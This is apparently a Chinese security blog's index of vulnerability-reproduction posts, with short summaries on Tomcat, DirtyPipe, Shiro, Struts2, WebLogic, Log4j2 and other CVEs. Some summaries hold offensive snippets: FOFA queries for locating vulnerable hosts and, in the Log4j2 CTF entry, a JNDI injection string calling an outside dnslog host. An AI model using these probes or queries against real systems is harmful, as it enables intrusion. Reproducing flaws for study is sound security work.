![](https://img-blog.csdnimg.cn/20201014180756928.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
漏洞复现
文章平均质量分 64
super 硕
一名专注于分享web安全的小白帽
展开
-
tomcat中间件漏洞复现
Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器。原创 2023-03-25 22:44:36 · 1837 阅读 · 2 评论 -
漏洞预警 - Linux DirtyPipe权限提升漏洞 CVE-2022-0847
漏洞预警 - Linux DirtyPipe权限提升漏洞 CVE-2022-0847漏洞描述CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pi原创 2022-03-08 14:47:18 · 774 阅读 · 2 评论 -
MS14-064漏洞复现
MS14-064漏洞复现摘要此安全更新可解决 Microsoft Windows 对象链接与嵌入 (OLE) 中 2 个私下报告的漏洞。最严重的漏洞可能在用户使用 Internet Explorer 查看经特殊设计的网页时允许远程执行代码。成功利用这些漏洞的攻击者可以在当前用户的上下文中运行任意代码。如果当前用户使用管理用户权限登录,则攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少用户权限的用户比具有管理用户权限的用户受到的影响要小。漏洞影响版本原创 2022-02-28 10:44:03 · 6880 阅读 · 0 评论 -
Shiro反序列化漏洞复现
Shiro反序列化漏洞复现Shiro简介Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。影响范围Apache Shiro <= 1.2.4漏洞简介Shiro反序列化漏洞主要存在Java开发的网站程序中,它是也属于java的反序列化漏洞。特征是响应包存在rememberMe标记,或者人为修改登陆包,在Cookie中rememberMe=deleteMe,同样观察回包是否存在rememberMe标记。如果存在,基本确定采用Shiro框架进行的认证原创 2022-02-23 15:37:52 · 1291 阅读 · 0 评论 -
nginx中间件漏洞复现
nginx中间件漏洞复现nginx介绍Nginx (engine x) 是一个高性能的HTTP和反向代理web服务器,同时也提供了IMAP/POP3/SMTP服务。Nginx是由伊戈尔·赛索耶夫为俄罗斯访问量第二的Rambler.ru站点(俄文:Рамблер)开发的,第一个公开版本0.1.0发布于2004年10月4日。其将源代码以类BSD许可证的形式发布,因它的稳定性、丰富的功能集、简单的配置文件和低系统资源的消耗而闻名。2011年6月1日,nginx 1.0.4发布。Nginx是一款轻量级的We原创 2022-02-22 16:14:15 · 6503 阅读 · 0 评论 -
CVE-2020-13942 Apache Unomi 远程代码执行漏洞复现
CVE-2020-13942 Apache Unomi 远程代码执行漏洞复现简介Apache Unomi 是一个基于标准的客户/数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验,比如 GDPR 和“不跟踪”偏好设置。其最初于 Jahia 开发,2015 年 10 月提交给了 Apache 孵化器。Apache Unomi 具有隐私管理、用户/事件/目标跟踪、报告、访客资料管理、细分、角色、A/B 测试等功能,它可以作为:原创 2022-02-18 16:37:25 · 393 阅读 · 0 评论 -
weblogic中间件漏洞复现
weblogic中间件漏洞复现weblogic介绍WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。WebLogic是美商Oracle的主要产品之一,是并购BEA得来。是商业市场上主要的Java(J2EE)应原创 2022-02-09 16:51:02 · 1197 阅读 · 0 评论 -
Struts2 S2-061(CVE-2020-17530)漏洞复现
Struts2 S2-061(CVE-2020-17530)漏洞复现漏洞简介Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。漏洞描述Struts2 会对某些标签属性(比如 id,其他属性有待寻找) 的属性值进行二次表达式解析,因此当这些标签属性原创 2022-01-21 10:15:47 · 5768 阅读 · 0 评论 -
Apache HTTP Server路径穿越漏洞 (CVE-2021-41773)
Apache HTTP Server路径穿越漏洞 (CVE-2021-41773)漏洞描述攻击者可以使用路径遍历攻击将URL映射到预期文档根以外的文件。如果文档根目录以外的文件不受require all denied保护,则攻击者可以访问这些文件。CVE编号CVE-2021-41773漏洞影响范围仅影响Apache HTTP Server 2.4.49版本漏洞评级高危漏洞复现环境搭建这里用github的项目进行漏洞复现项目下载地址:https://github.com/blasty/原创 2022-01-19 15:03:10 · 7372 阅读 · 0 评论 -
CISCO ASA远程任意文件读取
CISCO ASA远程任意文件读取简介Cisco Adaptive Security Appliance (ASA)是思科的一种防火墙设备。漏洞描述Cisco Adaptive Security Appliance (ASA)防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cook原创 2022-01-17 15:01:28 · 1038 阅读 · 0 评论 -
泛微E-Office文件上传漏洞(CNVD-2021-49104)
泛微E-Office文件上传漏洞(CNVD-2021-49104)漏洞描述泛微e-office是泛微旗下的一款标准协同移动办公平台。由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包,最终实现任意代码执行。CNVD编号CNVD-2021-49104FOFA语句app="泛微-EOffice"影响范围泛微e-office V9.0漏洞危害高危文件上传可直接get webshell漏洞复现使用FOFA进行资产收集漏洞POC构造请求原创 2022-01-06 09:47:08 · 648 阅读 · 0 评论 -
Apache ShenYu JWT认证缺陷漏洞(CVE-2021-37580)
Apache ShenYu JWT认证缺陷漏洞(CVE-2021-37580)漏洞描述Apache ShenYu(原名 Soul)是一个异步的、跨语言的、多协议的高性能响应式API 网关,并可应用于所有微服务场景。2021 年 11 月 16日,Apache发布安全公告,公开了Apache ShenYu中的一个身份验证绕过漏洞(CVE-2021-37580),该漏洞的CVSS评分为9.8。由于ShenyuAdminBootstrap中JWT的错误使用,导致攻击者可以绕过身份验证,直接进入目标系统后台。原创 2022-01-05 09:14:27 · 942 阅读 · 0 评论 -
Apache APISIX Dashboard 身份验证绕过漏洞(CVE-2021-45232)
Apache APISIX Dashboard 身份验证绕过漏洞(CVE-2021-45232)漏洞描述Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。CVE编号CVE-2021-45232FOFA语句title="Apache APISIX Dashboard"影响范围Apache原创 2021-12-30 20:55:24 · 2784 阅读 · 1 评论 -
Log4j2_RCE漏洞复现
Log4j2_RCE漏洞复现题目地址https://ctf.bugku.com/challenges/detail/id/340.html复现过程首先这里需要一台外网VPS服务器,然后在上面安装JNDI注入工具打开题目先使用dnslog进行测试${jndi:ldap://2c7b25a4.xxxxx.ceye.io/exp}填在账号输入的位置即可,密码随便填然后点击提交可以看到笔者这边的dnslog平台成功返回一条记录,说明存在Log4j2_RCE漏洞开启ldap和http服务原创 2021-12-20 09:46:13 · 1755 阅读 · 2 评论